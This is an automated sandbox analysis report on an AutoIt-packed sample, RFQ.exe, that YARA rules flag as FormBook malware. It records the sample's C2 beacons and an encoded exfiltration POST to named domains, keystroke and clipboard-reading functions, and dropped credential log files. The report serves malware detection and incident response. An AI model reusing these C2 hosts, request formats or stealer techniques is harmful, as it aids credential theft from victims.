          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=lki1ed3GPMN5Nw1jaHFlS3B9RQB9zvXEK7YHw36ZfVLkkOoQWGs0VMlLDODNdBIBI6zD&MR-p=0tPLH85x-lH HTTP/1.1Host: www.addis.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=PZkH6llHoqFvvgYvV7p0jyJ4zE2wugCWkpTMu12MC83jrlv2PlfP15O4FxttxOVUzuUw HTTP/1.1Host: www.teccommunications.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=HCt+Yhx/h4l+FCj3nKRKOvS7Xa1e0tc/Egfr+bgHKkeQjLAOt82B/JBt+eO2F9D4/3gd&MR-p=0tPLH85x-lH HTTP/1.1Host: www.obsoletelabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=5W/5kEIdtxVt3n/xoeTRd2P1yDG4A43nFAD006cGMUhROXoTda6GZj7hA5S0bqxvW5XG&MR-p=0tPLH85x-lH HTTP/1.1Host: www.artiyonq.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=dcH6q++BfneLHwYr+7wkAtOqeHmKUMZpIhb6VvBnwf4Bd/1QFFGV2dHI+mdn934ofCRD HTTP/1.1Host: www.tgers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?tVT=stAPCawU9FsBsDeLDlqawFgIxU41y6VpxlOSmtpgZq2QqlgInUNCOlYAlNLBb+BUECvq&MR-p=0tPLH85x-lH HTTP/1.1Host: www.kmwhbl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /m8l/?MR-p=0tPLH85x-lH&tVT=ovbFtOa4uTjd1a92oYI1beIGZw7s4qusWsZU0rgv2nLP+ugoFD+dLAFKen/jDfcukVqZ HTTP/1.1Host: www.nusaliterainspirasi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: cdn.onenote.net
          Source: unknownHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.addis.techConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.addis.techUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.addis.tech/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 74 47 75 50 41 39 53 76 64 6f 49 51 66 53 51 4e 65 52 6f 6b 4c 51 35 54 46 41 6c 4f 6b 64 66 5a 62 75 30 44 6b 6e 7e 77 50 48 76 35 68 66 31 4b 53 6b 64 77 64 63 74 50 42 59 47 63 5a 68 34 7a 4a 59 69 34 73 54 4f 54 45 36 36 56 4a 66 53 66 74 7a 43 36 4e 56 37 6d 61 4a 79 73 70 30 46 56 51 31 42 62 47 61 48 4e 4e 6f 6f 41 4f 62 30 6d 54 31 52 5a 45 35 75 74 4b 7a 78 68 50 71 52 35 65 54 43 57 53 7a 49 6c 4c 69 7a 59 6f 72 28 62 4e 55 54 6d 6b 70 44 5a 79 61 7a 53 68 48 50 48 62 74 7e 5a 79 2d 4b 48 65 47 61 6d 38 45 64 2d 68 57 63 6a 6e 31 62 74 50 6e 63 4b 45 4e 67 6c 72 6a 67 46 4f 2d 43 52 4f 52 62 32 6f 53 44 45 71 36 62 58 48 37 76 33 49 4a 6f 74 52 57 73 71 4f 51 28 67 67 52 59 4f 54 49 56 77 6a 6e 7a 57 6e 4a 7e 72 42 61 44 76 70 70 76 5a 70 76 32 37 71 56 6c 79 56 7a 6c 34 36 4f 44 59 7a 66 55 44 65 79 49 6c 69 2d 30 73 74 78 49 4c 59 30 70 5a 4b 4c 48 55 4b 53 6c 6b 54 39 35 39 73 4f 43 45 38 56 53 6f 47 46 51 4e 5a 45 71 38 49 42 6d 4d 78 61 73 76 54 45 6f 6e 62 6a 41 52 51 44 63 44 53 77 36 50 31 6a 75 7a 39 43 73 35 73 76 28 50 31 79 72 64 45 44 39 62 6c 72 78 53 44 30 61 4f 6b 54 4d 4f 58 65 77 36 61 36 42 41 34 4d 36 38 43 34 34 4c 54 4a 43 39 63 36 37 64 43 6a 6e 57 37 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: tVT=tGuPA9SvdoIQfSQNeRokLQ5TFAlOkdfZbu0Dkn~wPHv5hf1KSkdwdctPBYGcZh4zJYi4sTOTE66VJfSftzC6NV7maJysp0FVQ1BbGaHNNooAOb0mT1RZE5utKzxhPqR5eTCWSzIlLizYor(bNUTmkpDZyazShHPHbt~Zy-KHeGam8Ed-hWcjn1btPncKENglrjgFO-CRORb2oSDEq6bXH7v3IJotRWsqOQ(ggRYOTIVwjnzWnJ~rBaDvppvZpv27qVlyVzl46ODYzfUDeyIli-0stxILY0pZKLHUKSlkT959sOCE8VSoGFQNZEq8IBmMxasvTEonbjARQDcDSw6P1juz9Cs5sv(P1yrdED9blrxSD0aOkTMOXew6a6BA4M68C44LTJC9c67dCjnW7g).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeX-Powered-By: PHP/7.0.33Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nusaliterainspirasi.com/wp-json/>; rel="https://api.w.org/"Transfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Wed, 24 Jun 2020 01:54:03 GMTServer: LiteSpeedData Raw: 63 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 6d 6f db 38 12 fe 6c 03 f7 1f 14 16 4d 2c 54 6f b6 93 d8 71 2c 17 6d da de ed 6d bb ed b5 dd 3b 1c 36 c5 62 2c d1 32 6d 8a d4 92 b4 9d 5c 9a ff 7e 20 25 45 b2 f3 e6 74 0d dc e5 43 c4 d7 e1 33 c3 99 e1 70 e8 e1 de 9b 8f 67 5f ff fd e9 ad 35 55 29 1d 35 87 fa 63 51 60 49 88 30 43 a3 66 73 38 c5 10 8f 9a 8d 61 8a 15 58 d1 14 84 c4 2a 44 bf 7e 7d e7 f6 91 e5 df f4 30 48 71 88 96 04 af 32 2e 14 b2 22 ce 14 66 2a 44 2b 12 ab 69 18 e3 25 89 b0 6b 2a 8e 45 18 51 04 a8 2b 23 a0 38 6c eb 75 1a 43 4a d8 dc 12 98 86 28 13 7c 42 28 46 d6 54 e0 49 88 a6 4a 65 03 df 4f d2 2c f1 b8 48 fc 8b 09 f3 db ed 62 f1 da 2c c2 92 31 44 f3 8d 69 6c 21 81 12 85 05 10 26 33 22 40 12 2f e2 a9 7f 91 52 91 45 5e 36 cd 0c a5 66 63 a8 88 a2 78 f4 09 12 6c 31 ae ac 09 5f b0 78 e8 e7 ad cd 0a de 41 cc a4 9b 09 3c c1 2a 9a 1e e4 18 0f 7c ff 9e 75 0e b4 8c 1e 9d 2c 03 6f 95 69 58 5b 0e f7 12 01 4b 50 20 b6 9f 33 e1 4c 49 2f e1 3c a1 18 32 22 b7 9f 29 bd 95 96 fb 06 34 04 54 61 c1 40 61 64 a9 cb 0c 87 08 b2 8c 92 08 14 e1 cc 17 52 be b8 48 29 b2 8c f8 42 64 ed 0b f8 63 c1 4f ad 77 18 c7 5b ee d0 04 e3 d8 37 9b 53 c9 ef 07 57 3d e3 69 8a 99 92 4f 59 3e 2a e6 f8 15 8e 46 63 28 23 41 32 55 70 ac f0 85 f2 67 b0 84 bc 15 8d 9a 8d 46 63 45 58 cc 57 de ef ab 0c a7 7c 46 be 60 a5 08 4b a4 15 5a 57 68 0c 12 ff 2a 28 1a 18 a5 96 83 73 ff dc 2f c4 7b ee 93 14 12 2c cf fd 88 0b 7c ee 9b c9 e7 7e bb ed 75 bc e0 dc ef 75 2e 7a 9d 73 1f 39 08 5f 28 34 40 5e c6 12 e4 20 b9 4c 7e 8c 9e 5c 26 86 9a 5c 26 6f 73 82 72 69 08 f2 85 88 30 1a 5c a1 88 b3 08 94 81 51 e0 35 70 ef d1 f3 73 7f 95 b9 84 45 74 11 6b 1e 66 d2 34 98 d9 ae c0 14 83 c4 5e 4a 98 37 93 e8 fa fa 54 cb 69 6f b2 60 91 56 96 16 38 63 27 b2 af ca ba 15 eb 16 fb 6a 09 c2 8a c2 2f 4a 10 96 78 13 c1 d3 b3 29 88 33 1e e3 53 ea 45 14 83 f8 8c 23 d5 0a 9c c0 99 7b b9 63 99 7b 53 4c 92 a9 b2 1d ea 4d 08 a5 5f f1 85 6a 45 9e 56 cc cb 96 9a 12 e9 80 ed 04 4e 60 9f 6a da 71 38 f7 14 7f 03 0a 7e fd fc be 65 ff 09 aa e3 1a 55 bc 41 55 60 b5 10 cc 8a c3 30 c4 d7 37 2c e2 16 e4 0c 8e 4f c9 a4 b5 47 bf 7f df ab 20 db f9 9c bd f6 a9 5c 11 15 4d 5b d4 d3 9a f6 1a 24 a6 84 e1 10 29 9e 21 cd 22 d7 0e f6 38 08 ac 6e 27 bb b0 5e 09 02 14 39 60 5f 45 20 31 9a 50 48 d0 a0 20 d5 1a 87 71 eb b7 a3 a3 ee d1 b1 73 74 dc ef 1c 3b 37 e5 f6 c9 37 67 ad a7 df 09 ba 6b dd b6 bd bf bf 46 a0 d7 ed 76 9c a3 e3 76 a7 ef 1c 1d 1f 76 ba 55 b9 ad 5b ca f6 76 55 ee 06 55 b9 3e fe b0 57 2d 6e a8 e6 8b df 90 e8 3a eb 0d ed fe 46 43 a7 bd d1 d0 0d 36 1a 3a 9b 34 0e 7b df 6c 67 6f 6c 9f 1a 31 15 0a 5e 6c d3 8d 98 34 1f bd e3
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000009.00000000.831639365.0000000000CF0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000009.00000000.861192307.0000000010256000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E46B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00E46B0C
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E46B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,6_2_00E46B0C
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E32B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,6_2_00E32B37
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E5F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,6_2_00E5F7FF

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\8-LP7Q9T\8-Llogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\8-LP7Q9T\8-Llogrf.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\8-LP7Q9T\8-Llogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001E.00000002.1280450173.0000000002550000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.1277991458.0000000000DD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.1278238054.0000000001400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.881220627.00000000007D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.882704990.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001D.00000002.1277745187.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.880507060.0000000000401000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 29.2.ebplgh1bmx.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 8.2.RFQ.exe.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Binary is likely a compiled AutoIt script fileShow sources
          Source: RFQ.exe.exe, 00000000.00000000.762180934.0000000000E9E000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exe, 00000000.00000000.762180934.0000000000E9E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: This is a third-party compiled AutoIt script.6_2_00DF3D19
          Source: RFQ.exe.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exe, 00000006.00000000.813152196.0000000000E9E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: RFQ.exe.exe, 00000007.00000000.817261592.0000000000E9E000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exe, 00000007.00000000.817261592.0000000000E9E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: RFQ.exe.exe, 00000008.00000002.883444662.0000000000E9E000.00000002.00020000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exe, 00000008.00000002.883444662.0000000000E9E000.00000002.00020000.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: RFQ.exe.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: RFQ.exe.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A360 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_0153A360
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A3E0 NtFreeVirtualMemory,LdrInitializeThunk,8_2_0153A3E0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A240 NtReadFile,LdrInitializeThunk,8_2_0153A240
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A2D0 NtClose,LdrInitializeThunk,8_2_0153A2D0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A540 NtDelayExecution,LdrInitializeThunk,8_2_0153A540
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A560 NtQuerySystemInformation,LdrInitializeThunk,8_2_0153A560
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A5F0 NtReadVirtualMemory,LdrInitializeThunk,8_2_0153A5F0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A410 NtQueryInformationToken,LdrInitializeThunk,8_2_0153A410
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A480 NtMapViewOfSection,LdrInitializeThunk,8_2_0153A480
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A4A0 NtUnmapViewOfSection,LdrInitializeThunk,8_2_0153A4A0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A750 NtCreateFile,LdrInitializeThunk,8_2_0153A750
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A700 NtProtectVirtualMemory,LdrInitializeThunk,8_2_0153A700
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A720 NtResumeThread,LdrInitializeThunk,8_2_0153A720
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A610 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_0153A610
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A6A0 NtCreateSection,LdrInitializeThunk,8_2_0153A6A0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A800 NtSetValueKey,8_2_0153A800
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153B0B0 NtGetContextThread,8_2_0153B0B0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A350 NtQueryValueKey,8_2_0153A350
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A370 NtQueryInformationProcess,8_2_0153A370
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A310 NtEnumerateValueKey,8_2_0153A310
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A3D0 NtCreateKey,8_2_0153A3D0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A260 NtWriteFile,8_2_0153A260
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153BA30 NtSetContextThread,8_2_0153BA30
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A220 NtWaitForSingleObject,8_2_0153A220
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A2F0 NtQueryInformationFile,8_2_0153A2F0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153BD40 NtSuspendThread,8_2_0153BD40
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A520 NtEnumerateKey,8_2_0153A520
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A5A0 NtWriteVirtualMemory,8_2_0153A5A0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153B470 NtOpenThread,8_2_0153B470
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A470 NtSetInformationFile,8_2_0153A470
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A460 NtOpenProcess,8_2_0153A460
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153B410 NtOpenProcessToken,8_2_0153B410
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A430 NtQueryVirtualMemory,8_2_0153A430
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153ACE0 NtCreateMutant,8_2_0153ACE0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A710 NtQuerySection,8_2_0153A710
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A780 NtOpenDirectoryObject,8_2_0153A780
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A650 NtQueueApcThread,8_2_0153A650
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_0153A6D0 NtCreateProcessEx,8_2_0153A6D0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00419830 NtCreateFile,8_2_00419830
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_004198E0 NtReadFile,8_2_004198E0
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00419960 NtClose,8_2_00419960
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00419A10 NtAllocateVirtualMemory,8_2_00419A10
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 8_2_00419A0B NtAllocateVirtualMemory,8_2_00419A0B
          Source: C:\Program Files (x86)\Wajuduf\ebplgh1bmx.exeCode function: 29_2_019DA3E0 NtFreeVirtualMemory,LdrInitializeThunk,29_2_019DA3E0
